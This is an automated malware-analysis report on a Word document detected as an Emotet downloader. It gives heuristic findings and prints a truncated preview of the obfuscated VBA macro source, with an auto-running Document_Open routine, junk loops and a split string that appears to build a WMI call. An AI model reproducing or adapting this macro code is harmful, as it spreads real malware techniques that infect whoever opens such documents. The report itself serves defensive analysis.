MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-7473497-0', strongly suggesting the Emotet family. The presence of a 'Document_Open' VBA macro, coupled with a 'GetObject' call, indicates an attempt to automatically execute malicious code when the document is opened. While the VBA code itself is heavily obfuscated and appears truncated, the overall structure and heuristic firings point to a downloader functionality.
Heuristics 6
-
ClamAV: Doc.Downloader.Emotet-7473497-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-7473497-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7618 bytes |
SHA-256: 4eb0a6204ead2a81b7a349e14398ad82fab5fd22cadc6ae7c7620b352b43e3e0 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Aojplemq"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Gzuokbkyuug, 0, 0, MSForms, TextBox"
Private Sub Document_open()
Ltyncvvwo = 234 + 423
Do While Cikubwvivihv = 1
Hcmhzkjwdl = 3 * Fqdsyasenoww
Fnxyeyndusjo = ("Repellendus est quia culpa omnis totam provident quibusdam aut dolorum.")
For Jffyugqfec = Cgwsgpnie To Fhbicvkijmfvh
Bnbajuowvggcm = ("Rerum ad nihil vel.")
Gingzqsy = 223
Next
Uuavxkoiio = Elfrlfbvs
Loop
Ewxdqdei
Ewdbqeofwfve = 234 + 423
Do While Ucwjhgwmvyh = 1
Rdkgxjky = 3 * Hscfaewhrzd
Ynesxsaetxd = ("Qui facilis cumque porro nam sunt eum sed in dolor.")
For Lzxvhrtl = Favhzrpsxom To Trngalouzizs
Wrljfjwzrb = ("Velit saepe.")
Ndffipzh = 223
Next
Ulszawfr = Chtalegcvuz
Loop
End Sub
Attribute VB_Name = "Jeuwzqvsdrcqz"
Attribute VB_Base = "0{37180A27-35CF-4DD5-8ADF-8363A452C7B0}{65924915-F776-442B-B179-A71421B8A689}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Rgzhzedt"
Function Ypzdgmswtvdol()
Ecpsjpwmt = 234 + 423
Do While Iflpcowzdtqob = 1
Qlrgusoolmu = 3 * Evuphzdzzkfb
Mnnnndwy = ("Et.")
For Nqguqadhjbui = Gckorame To Bbxyhbyfjab
Jiygysjieomg = ("Enim ut vel.")
Hhkijhrspcfz = 223
Next
Oyzzpjbf = Nlzgxmlswiqx
Loop
Ccahqiqatqpii = Aojplemq.Gzuokbkyuug
Xoxcfslhh = 234 + 423
Do While Pkocrnurft = 1
Kkoupcjxomswo = 3 * Llcoewtryqjb
Bqljpnrrywfxb = ("Autem.")
For Sroysigd = Cqtqegapan To Nyfcungih
Ofyvdbnvnganx = ("Ipsa minima aut odit laborum architecto.")
Upfiaghl = 223
Next
Tqotxwchqfk = Xomriamlhe
Loop
Iyufykfdyvmgd = Ccahqiqatqpii + Jeuwzqvsdrcqz.Gshrkbqz + Jeuwzqvsdrcqz.Zomuekcd + Jeuwzqvsdrcqz.Jrgysmbu
Zcyuqbzhudyk = 234 + 423
Do While Wvxzhtphlfoe = 1
Ibunrqdbman = 3 * Aoxboyme
Vjpfsrtgmsmz = ("In tempora dolor aut amet.")
For Kskovjxldp = Ndafwiujyeck To Sublrbvoqv
Jeukgzrzeqfgv = ("Ut facilis sint consequatur et et voluptas.")
Jkgqadlqc = 223
Next
Xmwymfrzzqoo = Skfbpvqn
Loop
Ztivzgiogphbr = Iyufykfdyvmgd + Jeuwzqvsdrcqz.Yiaxbzchth + Jeuwzqvsdrcqz.Xgxatuyc.Tag
Lhsyghafslbi = 234 + 423
Do While Letzvixom = 1
Xdgyuyaelpj = 3 * Hgrkaaarl
Gdjeewwuxkid = ("Ea et.")
For Xmadmqbyo = Rnomuxlsorr To Aosoiuycxcdnz
Uphpromjiicnw = ("Magnam.")
Pgxecxxnq = 223
Next
Ntkkyuimxzkb = Ofkffhbrs
Loop
Ypzdgmswtvdol = Mqqyhrxynq + Ztivzgiogphbr + Mqqyhrxynq
Yyqtlblmjar = 234 + 423
Do While Usazcqclwva = 1
Bvovtqeuu = 3 * Dwiiuaeoe
Iihvwfbbcqq = ("Quaerat id voluptates quis est.")
For Pyngajvzaswfh = Wqlyskngoyty To Prmpitwmynup
Plpplkfme = ("Dicta.")
Pcryihkdhla = 223
Next
Zavjsxectfr = Enincmvatq
Loop
End Function
Function Ewxdqdei()
Hhahpldlmgytv = 234 + 423
Do While Bdbvsqpntmg = 1
Cpsroosgidlmw = 3 * Nxrrvfnk
Iisthuiee = ("Larry")
For Ogehjisaqjwkm = Vpltofzmgfamb To Hrygzqmk
Ujcwmygukzttl = ("Ronnie")
Puyciwrsobfm = 223
Next
Gifyxuvw = Gurqiiogepkv
Loop
iwiwiiwiwjjsj = "__&888*&^bBGks^@"
Dxztlkebm = 234 + 423
Do While Ngqkvsvdtavag = 1
Mvopoxnzbmda = 3 * Vpwvlvkkk
Xiaghwsmsyin = ("Sint hic officiis vel.")
For Bagoxrskw = Yfumibldur To Ttpkosinbao
Evmtdnmdvjry = ("Et.")
Wwjcpnmnvh = 223
Next
Rojjyrkr = Zjqecjxky
Loop
Uqdvmpngkfcs = Split("__&888*&^bBGks^@wi__&888*&^bBGks^@nmg__&888*&^b" + "BGks^@mts__&888*&^b
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.